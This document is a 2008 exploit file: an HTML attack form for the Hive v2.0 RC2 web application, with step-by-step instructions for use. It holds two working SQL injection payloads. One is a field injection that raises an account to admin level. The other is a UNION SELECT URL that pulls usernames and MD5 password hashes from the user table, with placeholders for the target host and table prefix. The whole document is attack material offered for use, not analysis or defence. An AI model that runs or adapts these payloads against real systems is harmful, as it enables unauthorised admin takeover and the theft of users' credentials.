digitalhive-sql.txt
Posted on 11 January 2008
<!-- Hive v2.0 RC2 Remote SQL Injection c0ded by j0j0 --> <html> <head> <style type="text/css"> body { margin:3%; font-size:10px; color:#FFFFFF; font-family:Verdana,Arial; background-color:#1a1a1a; text-align: center; } input { background:#303030; color:#FFFFFF; font-family:Verdana,Arial; font-size:10px; vertical-align:middle; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d; padding: 3px; margin: 2px; } input[type=text] { width: 200px; } textarea { background:#303030; color:#FFFFFF; font-family:Verdana,Arial; font-size:10px; vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212; } table td { font-size: 10px; font-family: Verdana, Arial; } h3 { color: #CC0000; } a { color: #999999; text-decoration: none; font-weight: bold; } #exploit { font-family: Courier New, sans-ms; font-size: 12px; color: #00FF00; width: 400px; text-align: left; } </style> </head> <body> <center> <h3>Hive v2.0 RC2 Remote SQL Injection<br /><br />-= c0ded by j0j0 =-</h3> <br /> <p>you must first create an account, and log in.<br /> then you can send exploit<br /> <span style="color:#cc0000;">don't forget to change the action="" URL of this form</span></p> <p> </p> <table width="600px" cellspacing="1"> <tr> <td width="20%" class="td5_2">Username</td> <td class="td5_1"><input type="text" name="id" value="admin" /></td> <td>you will use this username to login</td> </tr> <tr> <td class="td5_2">Password</td> <td class="td5_1"><input type="text" name="password" value="admin" /></td> <td>you will use this password to login</td> </tr> <tr> <td class="td5_2">Mail</td> <td class="td5_1"><input type="text" class="texte" name="mail" size="24" value="You_Were_H4ck3d@microsoft.com" /></td> <td>email doesn't have importance</td> </tr> <tr> <td class="td5_2">SQL Injection</td> <td colspan="3" class="td5_1"> <input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/> </td> </tr> </table> <p>purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)<br /></p> <br> <input type="submit" name="submitButtonName" value="Attack"> <p> </p> <p>Now you are admin, logout and re-login with new username/password</p> <p>There is another one injection : <div style="max-width:500px;"> http://{HOST}//os/win10/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/ 0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE<br />/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*<br /> </div> <br /><br /> Change {HOST}, /os/win10, {SQL_PREFIX} and {MEMBER_ID}<br /> then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)</p> <!-- Hidden inputs --> <input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="age" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="icq" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="msn" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="aim" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="site" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="text" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d" > <input type="hidden" value="false" name="online" > </form> </center> </body> </html>
